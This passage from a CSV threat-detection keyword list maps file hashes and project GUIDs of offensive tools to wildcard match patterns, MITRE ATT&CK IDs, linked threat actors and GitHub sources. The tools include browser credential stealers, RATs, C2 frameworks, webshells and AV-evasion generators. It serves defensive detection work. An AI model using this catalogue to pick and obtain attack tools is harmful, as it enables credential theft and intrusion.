Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#filehash","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","30366" "*873fdbf2756b2826ee7946770aacd8945e3d3470cb5ced3a23c36b0a988d1b1e*",".{0,1000}873fdbf2756b2826ee7946770aacd8945e3d3470cb5ced3a23c36b0a988d1b1e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30367" "*8742b933c06da3e2de7f8945520870da234a5744bddd18c5339ff4b1faf0ad57*",".{0,1000}8742b933c06da3e2de7f8945520870da234a5744bddd18c5339ff4b1faf0ad57.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","30368" "*87440f0b-dacf-4695-a483-031fdc0b0194*",".{0,1000}87440f0b\-dacf\-4695\-a483\-031fdc0b0194.{0,1000}","offensive_tool_keyword","BrowserSnatch","steals important data from all chromium and gecko browsers installed in the system and gather the data in a stealer db to be exfiltrated out. 
A powerful Browser Stealer","T1081 - T1074 - T1114 - T1005 - T1041 - T1027","TA0006 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/shaddy43/BrowserSnatch","1","0","#GUIDproject","N/A","10","3","246","39","2025-03-31T21:04:30Z","2024-08-26T18:38:42Z","30369" "*8744313fbf925e7dc5aada01fa6b89589bdac85546a51c766fe51b763c984487*",".{0,1000}8744313fbf925e7dc5aada01fa6b89589bdac85546a51c766fe51b763c984487.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","30370" "*874dbda99983730fafd8054b29996e692cfe12c4230cb97d3b53e5db4df4238c*",".{0,1000}874dbda99983730fafd8054b29996e692cfe12c4230cb97d3b53e5db4df4238c.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","30371" "*87582936adeabd882de92613193a3fefdc2d388238a7c67c3bb41666ac3b2dda*",".{0,1000}87582936adeabd882de92613193a3fefdc2d388238a7c67c3bb41666ac3b2dda.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","30373" 
"*875a8faa095079fb31413ed16454c8d9ef0a23199984ac734e882c99914975ea*",".{0,1000}875a8faa095079fb31413ed16454c8d9ef0a23199984ac734e882c99914975ea.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","30374" "*875c428604faaa6f393b263aef783d9cd535b57135d668d949014052132e3c8b*",".{0,1000}875c428604faaa6f393b263aef783d9cd535b57135d668d949014052132e3c8b.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","30375" "*875fdc51b4427def008cdd88a81241e4791eb002c7d70fd8b71084ed8b6831ec*",".{0,1000}875fdc51b4427def008cdd88a81241e4791eb002c7d70fd8b71084ed8b6831ec.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","30376" "*8760b515dc5f94eaed37ef0ded50d083cc32e65e5b430089482c00fd40c0c555*",".{0,1000}8760b515dc5f94eaed37ef0ded50d083cc32e65e5b430089482c00fd40c0c555.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30377" "*876236cb7297de4232a08d57ff6e5929ad522d150f35a288915f9e0a1d4b9968*",".{0,1000}876236cb7297de4232a08d57ff6e5929ad522d150f35a288915f9e0a1d4b9968.{0,1000}","offensive_tool_keyword","SigmaPotato","SeImpersonate privilege escalation tool","T1134 - T1055 - T1543","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/tylerdotrar/SigmaPotato","1","0","#filehash","N/A","9","4","326","38","2024-05-16T23:46:04Z","2023-09-09T01:35:42Z","30378" "*87623bf79b1d7bbd0e66a6e6c5e534afdef66debdd5ff363648cb5482e7a6ed7*",".{0,1000}87623bf79b1d7bbd0e66a6e6c5e534afdef66debdd5ff363648cb5482e7a6ed7.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","30379" "*8769a14055d8c1d1f2dce1642ba7fdf3f8d4c24cafee7348857403905c50f4d6*",".{0,1000}8769a14055d8c1d1f2dce1642ba7fdf3f8d4c24cafee7348857403905c50f4d6.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black 
Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","30381" "*876b33b3871778abc2ac0523ef7ef9a23302eebbac92b193ac564946207f9477*",".{0,1000}876b33b3871778abc2ac0523ef7ef9a23302eebbac92b193ac564946207f9477.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30382" "*877d4290b0f991fcf2fb3e5f64916a2dfb844280010df806d28a94ad57f0de07*",".{0,1000}877d4290b0f991fcf2fb3e5f64916a2dfb844280010df806d28a94ad57f0de07.{0,1000}","offensive_tool_keyword","MetasploitCoop","Post-exploitation collaboration platform based on MSF","T1105 - T1098 - T1104 - T1136","TA0010 - TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x727/MetasploitCoop-Backend","1","0","#filehash","N/A","10","10","37","8","2021-08-17T10:26:17Z","2021-08-17T07:52:12Z","30387" "*878273cce2ef59c3bf4a3e4533a6b4101c9a21d57cc629cabe12ef6a05c8dda9*",".{0,1000}878273cce2ef59c3bf4a3e4533a6b4101c9a21d57cc629cabe12ef6a05c8dda9.{0,1000}","offensive_tool_keyword","Bat-Potato","Automating Juicy Potato Local Privilege Escalation CMD exploit for penetration testers","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege 
Escalation","https://github.com/0x4xel/Bat-Potato","1","0","#filehash","N/A","10","1","42","11","2022-12-13T20:19:51Z","2022-12-12T20:50:22Z","30389" "*8785484adcc6ef562248e172e23ebb36ab0b7b500281a56230bb102295586897*",".{0,1000}8785484adcc6ef562248e172e23ebb36ab0b7b500281a56230bb102295586897.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/XiebroC2","1","0","#filehash","N/A","10","10","1200","192","2025-02-28T09:44:43Z","2024-02-15T15:46:07Z","30390" "*878a57b1c2dc3321cfb5728358e482230b6efb7f08a116fb12ac0a26ce63335d*",".{0,1000}878a57b1c2dc3321cfb5728358e482230b6efb7f08a116fb12ac0a26ce63335d.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","30392" "*87904247-C363-4F12-A13A-3DA484913F9E*",".{0,1000}87904247\-C363\-4F12\-A13A\-3DA484913F9E.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","0","#GUIDproject","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","30394" "*8793997d31b23280ec1a46ff7fd065a6510ea66fcbf12651583244805e958212*",".{0,1000}8793997d31b23280ec1a46ff7fd065a6510ea66fcbf12651583244805e958212.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential 
Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","#filehash","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","30396" "*87998922dfe61e2c69bd8bd483f81668d961843d9afb491f0dc48694e19b4002*",".{0,1000}87998922dfe61e2c69bd8bd483f81668d961843d9afb491f0dc48694e19b4002.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","30397" "*879a204ae929df09dacb239b3a1224069c6a48de328adab89c91c02b2937c74c*",".{0,1000}879a204ae929df09dacb239b3a1224069c6a48de328adab89c91c02b2937c74c.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","30398" "*879A49C7-0493-4235-85F6-EBF962613A76*",".{0,1000}879A49C7\-0493\-4235\-85F6\-EBF962613A76.{0,1000}","offensive_tool_keyword","SnaffPoint","A tool for pointesters to find candies in SharePoint","T1210.001 - T1087.002 - T1059.006","TA0007 - TA0002 - TA0006","N/A","N/A","Discovery","https://github.com/nheiniger/SnaffPoint","1","0","#GUIDproject","N/A","7","3","254","25","2022-11-04T13:26:24Z","2022-08-25T13:16:06Z","30399" 
"*87ad24ba9c07337abc8310c7107359fdcf86b9e182b7b93e1f375888fb82dfc1*",".{0,1000}87ad24ba9c07337abc8310c7107359fdcf86b9e182b7b93e1f375888fb82dfc1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30405" "*87ae04b11731fe410b0e3bc87e6c99150dc9ba79bfcbd0ec4bf368930e6e2e7b*",".{0,1000}87ae04b11731fe410b0e3bc87e6c99150dc9ba79bfcbd0ec4bf368930e6e2e7b.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. 
HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","30406" "*87b841b9eedbe53eea82fdd3553b459fd1041d757dd1c2279429739fc9c8f7a0*",".{0,1000}87b841b9eedbe53eea82fdd3553b459fd1041d757dd1c2279429739fc9c8f7a0.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","30407" "*87beb1086bd0d4b1a6e66fa634eadcbf379c7fae17967f61b8cf97fad6bb4887*",".{0,1000}87beb1086bd0d4b1a6e66fa634eadcbf379c7fae17967f61b8cf97fad6bb4887.{0,1000}","offensive_tool_keyword","ShadowStealer","Google Chrome Passwords , Cookies and SystemInfo Dumper","T1555 - T1539 - T1125 - T1083 - T1056","TA0009 - TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/xelroth/ShadowStealer","1","0","#filehash","N/A","10","","N/A","","","","30408" "*87bebb9efbb1fe180ef24187b681894eaf6ce874e7d723299b37d10712b59176*",".{0,1000}87bebb9efbb1fe180ef24187b681894eaf6ce874e7d723299b37d10712b59176.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","30409" 
"*87BEF4D7-813E-48BA-96FE-E3A24BF2DC34*",".{0,1000}87BEF4D7\-813E\-48BA\-96FE\-E3A24BF2DC34.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","30410" "*87c4041617fc7010b7e20630ae48cc8c17dc84cd6fb5c330f0bc92af52baa2fa*",".{0,1000}87c4041617fc7010b7e20630ae48cc8c17dc84cd6fb5c330f0bc92af52baa2fa.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","#filehash","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","30413" "*87c51194806fc56b347e34b41c845c3fbe2c9602cdeb3b355d1215182013e613*",".{0,1000}87c51194806fc56b347e34b41c845c3fbe2c9602cdeb3b355d1215182013e613.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","#filehash","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","30414" "*87c96e5d650e67d985bdbb2bf4be55c94f8b967b180d45c1c073cbcd57cf1ddb*",".{0,1000}87c96e5d650e67d985bdbb2bf4be55c94f8b967b180d45c1c073cbcd57cf1ddb.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30415" "*87e26c35fb03226e9a2252b65bf017f9e1921aafadc28de78ea583eb5730ea7e*",".{0,1000}87e26c35fb03226e9a2252b65bf017f9e1921aafadc28de78ea583eb5730ea7e.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - 
LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","30418" "*87ea7ed313b723b21d126d3a9ffa5daa2a9713853f1fba9274044b78fac9f40f*",".{0,1000}87ea7ed313b723b21d126d3a9ffa5daa2a9713853f1fba9274044b78fac9f40f.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","30420" "*87ea7ed313b723b21d126d3a9ffa5daa2a9713853f1fba9274044b78fac9f40f*",".{0,1000}87ea7ed313b723b21d126d3a9ffa5daa2a9713853f1fba9274044b78fac9f40f.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","30421" "*87ebba9881dfa1757459d72857e2f03132b83291e29d6b92096e9ca3d6dd14f3*",".{0,1000}87ebba9881dfa1757459d72857e2f03132b83291e29d6b92096e9ca3d6dd14f3.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","30422" "*87f28c29263f95595eaa3c35a9091eaa5ccadce9f84738309f8781328465ede2*",".{0,1000}87f28c29263f95595eaa3c35a9091eaa5ccadce9f84738309f8781328465ede2.{0,1000}","offensive_tool_keyword","Minimalistic-offensive","A repository of tools for pentesting of restricted and isolated environments.","T1110 - T1046 - T1021 - T1203 - 
T1485","TA0006 - TA0007 - TA0008","N/A","Dispossessor","Discovery","https://github.com/InfosecMatter/Minimalistic-offensive-security-tools","1","0","#filehash","N/A","7","6","562","121","2021-10-26T11:04:46Z","2020-05-10T17:40:31Z","30423" "*87f65cfedc589113ba5daa88384928e45b4923bd6b9b0fb47e3c112e11fcf353*",".{0,1000}87f65cfedc589113ba5daa88384928e45b4923bd6b9b0fb47e3c112e11fcf353.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","30424" "*880b020391f6702f07775929110ac0f9aff0cec6fce2bd8e1e079bcace792e33*",".{0,1000}880b020391f6702f07775929110ac0f9aff0cec6fce2bd8e1e079bcace792e33.{0,1000}","offensive_tool_keyword","BITSInject","A one-click tool to inject jobs into the BITS queue (Background Intelligent Transfer Service) allowing arbitrary program execution as the NT AUTHORITY/SYSTEM account","T1197","TA0004","N/A","N/A","Privilege Escalation","https://github.com/SafeBreach-Labs/BITSInject","1","0","#filehash","N/A","8","1","99","18","2019-08-24T22:02:12Z","2017-07-03T12:39:38Z","30428" "*88113ededbda181be6c6f9bd4ba8145666b48bf9e9b8dc170e66e884b10fdc91*",".{0,1000}88113ededbda181be6c6f9bd4ba8145666b48bf9e9b8dc170e66e884b10fdc91.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - 
COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","30429" "*88147650f66ab1b4ec3d2a97ef8083ebd78cfdde63f7a5bad73b2d4e9e48a365*",".{0,1000}88147650f66ab1b4ec3d2a97ef8083ebd78cfdde63f7a5bad73b2d4e9e48a365.{0,1000}","offensive_tool_keyword","Adzok","RAT tool - a variant of Adwind abused by TA","T1219 - T1105 - T1027 - T1059 - T1204","TA0011 - TA0005 - TA0002 - TA0008","N/A","Packrat","Malware","https://sourceforge.net/projects/adzok/files/Adzok_Open_v1.0.0.2.jar/download","1","0","#filehash","N/A","8","8","N/A","N/A","N/A","N/A","30430" "*88184fc856b37ace040097bb476e71a445f8ef1ac3e66b6bcac98f29bb5bf64e*",".{0,1000}88184fc856b37ace040097bb476e71a445f8ef1ac3e66b6bcac98f29bb5bf64e.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","0","#filehash","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","30432" "*8819246132617282fade672cf544bff340d1a286980bce9c59b9ae41e221fc8f*",".{0,1000}8819246132617282fade672cf544bff340d1a286980bce9c59b9ae41e221fc8f.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","30433" "*881a10b5415e1e8c83986a81ae9a126c361b21964e8db7b93149d236191b29a0*",".{0,1000}881a10b5415e1e8c83986a81ae9a126c361b21964e8db7b93149d236191b29a0.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - 
LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","30434" "*881b34736ca2118b27dbf1c9340930094cb735de8cb22dee9e1619537201b654*",".{0,1000}881b34736ca2118b27dbf1c9340930094cb735de8cb22dee9e1619537201b654.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","30435" "*881D4D67-46DD-4F40-A813-C9D3C8BE0965*",".{0,1000}881D4D67\-46DD\-4F40\-A813\-C9D3C8BE0965.{0,1000}","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","0","#GUIDproject","N/A","8","5","496","62","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z","30436" "*881D4D67-46DD-4F40-A813-C9D3C8BE0965*",".{0,1000}881D4D67\-46DD\-4F40\-A813\-C9D3C8BE0965.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","#GUIDproject","N/A","10","4","394","76","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z","30437" "*8822c7fa386065eace366042536dcbc277a5be58efae8ce02bf9e4c583e07918*",".{0,1000}8822c7fa386065eace366042536dcbc277a5be58efae8ce02bf9e4c583e07918.{0,1000}","offensive_tool_keyword","tsh-go","Tiny SHell Go - An open-source backdoor written in Go","T1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009","TA0003 - TA0005 - TA0011 - 
